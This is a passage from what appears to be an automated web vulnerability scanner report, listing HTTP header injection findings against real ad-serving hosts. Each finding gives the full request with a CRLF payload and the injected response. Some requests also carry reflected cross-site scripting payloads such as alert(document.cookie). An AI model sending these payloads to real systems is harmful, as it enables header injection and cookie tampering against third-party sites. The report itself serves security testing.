Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/77f38
49cfd0de220
/N6138.6483.MENSHEALTH/B5295230.24;sz=1x1;pc=[TPAS_ID];ord=8309460:
Date: Thu, 10 Mar 2011 16:43:32 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.19. http://ad.doubleclick.net/ad/N6138.6483.MENSHEALTH/B5295230.25 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N6138.6483.MENSHEALTH/B5295230.25

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 84bba%0d%0a3dbcb4b9585 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /84bba%0d%0a3dbcb4b9585/N6138.6483.MENSHEALTH/B5295230.25;sz=1x1;pc=[TPAS_ID];ord=8309460? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/84bba
3dbcb4b9585
/N6138.6483.MENSHEALTH/B5295230.25;sz=1x1;pc=[TPAS_ID];ord=8309460:
Date: Thu, 10 Mar 2011 16:43:33 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.20. http://ad.doubleclick.net/ad/N6357.menshealth.comOX4549/B4645123.52 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N6357.menshealth.comOX4549/B4645123.52

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3c2b9%0d%0a6d4346a60d9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3c2b9%0d%0a6d4346a60d9/N6357.menshealth.comOX4549/B4645123.52;sz=1x1;ord=8296241? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3c2b9
6d4346a60d9
/N6357.menshealth.comOX4549/B4645123.52;sz=1x1;ord=8296241:
Date: Thu, 10 Mar 2011 16:42:35 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.21. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6d03d%0d%0a4b47254b0af was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6d03d%0d%0a4b47254b0af/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=;ord=1648973795? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6d03d
4b47254b0af
/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http: //googleads.g.doubleclick.net/aclk
Date: Thu, 10 Mar 2011 16:45:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.22. http://ad.doubleclick.net/adj/bicycling/home [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/bicycling/home

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6c73c%0d%0a2b896a07724 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6c73c%0d%0a2b896a07724/bicycling/home;rasegs=seg2;kw=;slot=123x204.1;topic=home;sbtpc=home;tile=2;sz=123x204;ord=972634134814143.1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bicycling.com/?cm_sp=Network%20Banner-_-BI-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6c73c
2b896a07724
/bicycling/home;rasegs=seg2;kw=;slot=123x204.1;topic=home;sbtpc=home;tile=2;sz=123x204;ord=972634134814143.1:
Date: Thu, 10 Mar 2011 16:40:03 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.23. http://ad.doubleclick.net/adj/menshealth/home [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/menshealth/home

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7fb28%0d%0a5d755171d05 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7fb28%0d%0a5d755171d05/menshealth/home;rasegs=seg2;kw=;slot=728x90;topic=home;sbtpc=home;tile=1;sz=728x90;dcopt=ist;ord=3548400804866105.5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7fb28
5d755171d05
/menshealth/home;rasegs=seg2;kw=;slot=728x90;topic=home;sbtpc=home;tile=1;sz=728x90;dcopt=ist;ord=3548400804866105.5:
Date: Thu, 10 Mar 2011 16:40:56 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.24. http://ad.doubleclick.net/adj/organicgardening/home [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/organicgardening/home

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2c10d%0d%0ab8b8b321907 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2c10d%0d%0ab8b8b321907/organicgardening/home;rasegs=seg2;kw=;slot=728x90.1;topic=home;sbtpc=home;tile=1;dcopt=ist;sz=728x90;ord=2537748990580439.5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.organicgardening.com/?cm_sp=Network%20Banner-_-OG-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2c10d
b8b8b321907
/organicgardening/home;rasegs=seg2;kw=;slot=728x90.1;topic=home;sbtpc=home;tile=1;dcopt=ist;sz=728x90;ord=2537748990580439.5:
Date: Thu, 10 Mar 2011 16:45:07 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.25. http://ad.doubleclick.net/adj/prevention/home [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/prevention/home

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3a618%0d%0abf6e70eb76b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3a618%0d%0abf6e70eb76b/prevention/home;topic=home;sbtpc=home;cat=;kw=;tile=2;slot=203x88.1;sz=203x88;ord=4994262496475130? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3a618
bf6e70eb76b
/prevention/home;topic=home;sbtpc=home;cat=;kw=;tile=2;slot=203x88.1;sz=203x88;ord=4994262496475130:
Date: Thu, 10 Mar 2011 16:40:05 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.26. http://ad.doubleclick.net/adj/prevention/lifelongbeauty [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/prevention/lifelongbeauty

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 11bac%0d%0acea0052660f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /11bac%0d%0acea0052660f/prevention/lifelongbeauty;rasegs=seg2;topic=eb53a'style='xexpression(alert(1))'f8b875ad203;sbtpc=bobbibrown;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=6897114093881100? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.prevention.com/cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beauty/eb53a'style%3d'x%3aexpression(alert(1))'f8b875ad203/bobbi.brown
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/11bac
cea0052660f
/prevention/lifelongbeauty;rasegs=seg2;topic=eb53a'style='xexpression(alert(1))'f8b875ad203;sbtpc=bobbibrown;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;ord=6897114093881100:
Date: Thu, 10 Mar 2011 22:23:23 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.27. http://ad.doubleclick.net/adj/rodale/fitness [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/rodale/fitness

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 62f9f%0d%0a36bce5cafc7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /62f9f%0d%0a36bce5cafc7/rodale/fitness;topic=8astonishingbenefitsofwalking;sbtpc=;cat=fitness;slot=160x600.1;tile=1;sz=160x600;kw=;ord=142681257566437120? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.rodale.com/benefits-walking?4bec2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eec68e81f22b=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/62f9f
36bce5cafc7
/rodale/fitness;topic=8astonishingbenefitsofwalking;sbtpc=;cat=fitness;slot=160x600.1;tile=1;sz=160x600;kw=;ord=142681257566437120:
Date: Thu, 10 Mar 2011 22:18:52 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.28. http://ad.doubleclick.net/adj/runnersworld/community [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/runnersworld/community

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 89a70%0d%0a4a192a08534 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /89a70%0d%0a4a192a08534/runnersworld/community;rasegs=seg2;kw=;slot=728x90.1;topic=profile;sbtpc=blogviewpost;tile=1;dcopt=ist;sz=728x90;ord=226473612710833540? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.runnersworld.com/community/persona/index.jsp?UID=8381023245&plckPersonaPage=BlogViewPost&plckUserId=8381023245&plckPostId=Blog%3a8381023245Post%3abb649e12-3868-43dd-b515-23f9a69f8636&plckController=PersonaBlog&plckScript=personaScript&plckElementId=personaDest\6b663%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8d424413273
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/89a70
4a192a08534
/runnersworld/community;rasegs=seg2;kw=;slot=728x90.1;topic=profile;sbtpc=blogviewpost;tile=1;dcopt=ist;sz=728x90;ord=226473612710833540:
Date: Thu, 10 Mar 2011 22:19:51 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.29. http://ad.doubleclick.net/adj/runnersworld/home [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/runnersworld/home

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 113c7%0d%0a6798c3251f0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /113c7%0d%0a6798c3251f0/runnersworld/home;rasegs=seg2;kw=;slot=150x186.1;topic=home;sbtpc=home;tile=2;sz=150x186;ord=479584154672920700? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.runnersworld.com/?cm_sp=Network%20Banner-_-RW-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/113c7
6798c3251f0
/runnersworld/home;rasegs=seg2;kw=;slot=150x186.1;topic=home;sbtpc=home;tile=2;sz=150x186;ord=479584154672920700:
Date: Thu, 10 Mar 2011 16:40:03 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.30. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3b862%0d%0a8ca34c13755 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gif3b862%0d%0a8ca34c13755?8285523 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gif3b862
8ca34c13755
:
Date: Thu, 10 Mar 2011 16:42:30 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.31. http://ad.doubleclick.net/imp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /imp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5fcd0%0d%0af26994b0bbc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5fcd0%0d%0af26994b0bbc;v7;j;222850430;5-0;1;12147288;0/0;41092130/41109917/1;;~aopt=3/0/83/0;~okv=;rasegs=seg2;topic=home;sbtpc=home;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;~cs=g%3fhttp://s0.2mdn.net/2521530/2017187_menopause_1.jpg HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5fcd0
f26994b0bbc
;v7;j;222850430;5-0;1;12147288;0/0;41092130/41109917/1;;~aopt=3/0/83/0;~okv=;rasegs=seg2;topic=home;sbtpc=home;cat=;kw=;tile=1;slot=728x90.1;sz=728x90;dcopt=ist;~cs=g:
Date: Thu, 10 Mar 2011 16:40:33 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.32. http://amch.questionmarket.com/adsc/d876089/3/885674/adscout.php [ES cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d876089/3/885674/adscout.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload b94cd%0d%0a0acdc94cdfa was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d876089/3/885674/adscout.php?ord=8309460 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5Bb94cd%0d%0a0acdc94cdfa

Response

HTTP/1.1 200 OK
Date: Thu, 10 Mar 2011 16:43:13 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a210.dl
Set-Cookie: CS1=deleted; expires=Wed, 10-Mar-2010 16:43:12 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885674-3-1; expires=Mon, 30-Apr-2012 08:43:13 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5Bb94cd
0acdc94cdfa
_876089-4k:xM-0; expires=Mon, 30-Apr-2012 08:43:13 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

1.33. http://amch.questionmarket.com/adsc/d876089/3/885678/adscout.php [ES cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d876089/3/885678/adscout.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload da28e%0d%0af59a7dd42e was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d876089/3/885678/adscout.php?ord=8309460 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1; ES=da28e%0d%0af59a7dd42e

Response

HTTP/1.1 200 OK
Date: Thu, 10 Mar 2011 16:43:11 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a208.dl
Set-Cookie: CS1=deleted; expires=Wed, 10-Mar-2010 16:43:10 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885678-3-1; expires=Mon, 30-Apr-2012 08:43:11 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=da28e
f59a7dd42e
_876089-2k:xM-0; expires=Mon, 30-Apr-2012 08:43:11 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

1.34. http://amch.questionmarket.com/adsc/d876089/3/885679/adscout.php [ES cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d876089/3/885679/adscout.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload 9b893%0d%0a01a1d42b0c5 was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request
